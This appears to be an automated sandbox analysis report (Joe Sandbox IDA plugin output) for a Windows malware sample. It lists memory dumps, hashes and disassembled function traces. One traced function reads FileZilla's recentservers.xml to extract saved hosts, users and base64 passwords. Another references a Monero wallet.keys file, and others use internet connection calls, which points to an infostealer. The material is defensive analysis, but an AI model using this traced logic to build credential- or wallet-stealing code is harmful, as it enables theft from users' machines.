                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 1o?k
                                        • API String ID: 0-2833669673
                                        • Opcode ID: 1234ea919423ad58f1680418e60e484e4d0c9f7308a459410314341981525d57
                                        • Instruction ID: 9bfb5690ebf062e3ae1f330977b9cf9df4afdd580c9d3a86bbea71cdf65b2439
                                        • Opcode Fuzzy Hash: 1234ea919423ad58f1680418e60e484e4d0c9f7308a459410314341981525d57
                                        • Instruction Fuzzy Hash: C3516BB761C510EFE34C9A199C04A7B77D5EBC5760F13092EE8E2C7A40F770489182A3
                                        Function 010268A4 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: vEm
                                        • API String ID: 0-3739008277
                                        • Opcode ID: cce7e61571809e82e7ad40463ff4f2b83c19583b2b061b337c65483941f4e41b
                                        • Instruction ID: 73ca00de80d6f39f873dc6380b0f49c5393bcd1352d02819311b26464a957157
                                        • Opcode Fuzzy Hash: cce7e61571809e82e7ad40463ff4f2b83c19583b2b061b337c65483941f4e41b
                                        • Instruction Fuzzy Hash: 0A514BF3A183044FF7006A2DEC857A676D5EB54320F69463CEAD8C7380F9BD98068693
                                        Function 0107252B Relevance: .9, Instructions: 944COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ea00269c5b9583283c948dfd86fc1e4553f206633d128925dd5a3cfbc4a7945b
                                        • Instruction ID: 65b79ca3e7156ea083fc44a85a7ce5e68c50ac6b50d8b9f2ab3438223b439d93
                                        • Opcode Fuzzy Hash: ea00269c5b9583283c948dfd86fc1e4553f206633d128925dd5a3cfbc4a7945b
                                        • Instruction Fuzzy Hash: A85216F3608200AFE3146E2DEC8577AFBE5EF94320F1A893DE6C583744E63598458693
                                        Function 01188561 Relevance: .3, Instructions: 321COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8701d047ba8f6f065cd5fc430e4c767f014fb1cf1b926ce90c9c5eeaba2e1037
                                        • Instruction ID: 615f3dc8f20e63acc961a843b6fe9c683c5a479c6d8d4190e6eee2b8dbc4e0ac
                                        • Opcode Fuzzy Hash: 8701d047ba8f6f065cd5fc430e4c767f014fb1cf1b926ce90c9c5eeaba2e1037
                                        • Instruction Fuzzy Hash: 32A148F3A082009FE718AE1CEC8576AB7E5EF98310F19453DDAC5D3784E6359815CB86
                                        Function 00F24F5E Relevance: .2, Instructions: 178COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22efc3daf551621ad159f9c1708e590a3a519aa6432594b325b172b68c5f9a25
                                        • Instruction ID: 90c27fd157c381dbba632d6e4c635fc4328741820fbc506508e547b714085b0d
                                        • Opcode Fuzzy Hash: 22efc3daf551621ad159f9c1708e590a3a519aa6432594b325b172b68c5f9a25
                                        • Instruction Fuzzy Hash: 85514AF3A092049FD358AE2DEC4577AB7D7EBD8320F1A852DE38583788FD3558058686
                                        Function 010A775F Relevance: .1, Instructions: 146COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fb8539e3deeb8f809241483ce718149ffa8ac2f5585c34d4e6814eb94be1764e
                                        • Instruction ID: 690efe464eff9d80923d9d2593dd3d263c70fae42354a84f208297f3ecc125d4
                                        • Opcode Fuzzy Hash: fb8539e3deeb8f809241483ce718149ffa8ac2f5585c34d4e6814eb94be1764e
                                        • Instruction Fuzzy Hash: 2641C2F290D608DBE304AE99DC4463EBBE9EB94610F46C92DEAC687300E5325851C7D7
                                        Function 01055DE1 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6cf57101eb416f8f4b34b0fd45b502c4e89b0ccfa5f73a9aa71f2151f90e058
                                        • Instruction ID: 233b853540a353dd7539116964897c7e3cf7d587461f97c4fd8317ecea89ce52
                                        • Opcode Fuzzy Hash: a6cf57101eb416f8f4b34b0fd45b502c4e89b0ccfa5f73a9aa71f2151f90e058
                                        • Instruction Fuzzy Hash: FB3107F3A0431C8BF714AD39DC95762B6879BD0320F2B463D9B48977C4FC3AA8054289
                                        Function 01096E2B Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa9d85cf5d2002df337c2791f60b8d99b4f93c2f883e71765f87f5eddce0253f
                                        • Instruction ID: 6d31a59648e90cbd5964c437929e2536737140e9c3618e09f23033f5422c66c1
                                        • Opcode Fuzzy Hash: fa9d85cf5d2002df337c2791f60b8d99b4f93c2f883e71765f87f5eddce0253f
                                        • Instruction Fuzzy Hash: 5F214BF291C704AFD701AF69DC8267AF7E8EF58660F16482DEAD4C3640E77198408B93
                                        Function 00CB9750 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        Function 00CB0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CB8E0B
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
                                          • Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
                                          • Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
                                          • Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CA148F,00000000), ref: 00CA9A5A
                                          • Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CA148F), ref: 00CA9A90
                                          • Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A
                                          • Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00CC0DBA,00CC0DB7,00CC0DB6,00CC0DB3), ref: 00CB0362
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB0369
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00CB0385
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB0393
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00CB03CF
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB03DD
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00CB0419
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB0427
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00CB0463
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB0475
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB0502
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB051A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB0532
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB054A
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00CB0562
                                        • lstrcat.KERNEL32(?,profile: null), ref: 00CB0571
                                        • lstrcat.KERNEL32(?,url: ), ref: 00CB0580
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB0593
                                        • lstrcat.KERNEL32(?,00CC1678), ref: 00CB05A2
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB05B5
                                        • lstrcat.KERNEL32(?,00CC167C), ref: 00CB05C4
                                        • lstrcat.KERNEL32(?,login: ), ref: 00CB05D3
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB05E6
                                        • lstrcat.KERNEL32(?,00CC1688), ref: 00CB05F5
                                        • lstrcat.KERNEL32(?,password: ), ref: 00CB0604
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB0617
                                        • lstrcat.KERNEL32(?,00CC1698), ref: 00CB0626
                                        • lstrcat.KERNEL32(?,00CC169C), ref: 00CB0635
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB068E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: 20c573cca18af120348822e71a7dc7fee7fb46fd8242a493bbff1865baeea347
                                        • Instruction ID: ab5d579a14a59d6746876937a6107da3e33ce238b636be5d4bd37b83ba60958b
                                        • Opcode Fuzzy Hash: 20c573cca18af120348822e71a7dc7fee7fb46fd8242a493bbff1865baeea347
                                        • Instruction Fuzzy Hash: 2ED12F71900208AFCB04EBF5DD9AEEE7778EF54300F544428F542BA091DF75AA4AEB61
                                        Function 00CA5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
                                          • Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CA59F8
                                        • StrCmpCA.SHLWAPI(?,009DF1A0), ref: 00CA5A13
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA5B93
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,009DF2F0,00000000,?,009DE618,00000000,?,00CC1A1C), ref: 00CA5E71
